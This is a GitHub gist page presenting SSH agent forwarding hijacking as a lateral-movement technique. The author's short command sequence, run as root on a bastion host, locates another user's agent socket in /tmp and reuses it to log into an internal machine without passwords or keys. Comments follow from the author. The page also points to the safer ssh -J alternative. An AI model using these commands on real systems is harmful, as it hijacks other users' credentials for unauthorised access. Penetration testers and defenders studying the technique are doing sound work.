int0x80/SSH Agent Forwarding.md

Created January 7, 2021 00:59

Star (91) You must be signed in to star a gist
Fork (10) You must be signed in to fork a gist

Select an option

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/int0x80/9e7b096684dd37c478198404d171aa3f.js"></script>
Save int0x80/9e7b096684dd37c478198404d171aa3f to your computer and use it in GitHub Desktop.

Raw

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld

This post explains it well and details the safer ssh -J alternative.

Author

int0x80 commented Jan 7, 2021

@0xdade great add! I may have run into those in a former life 😉 Sometimes I have to remember to check /etc/ssh/ssh_config in addition to the home directory ~/.ssh/config files.

@wvu-r7 holy smokes, TIL! Can't wait to hit a Windows machine with this.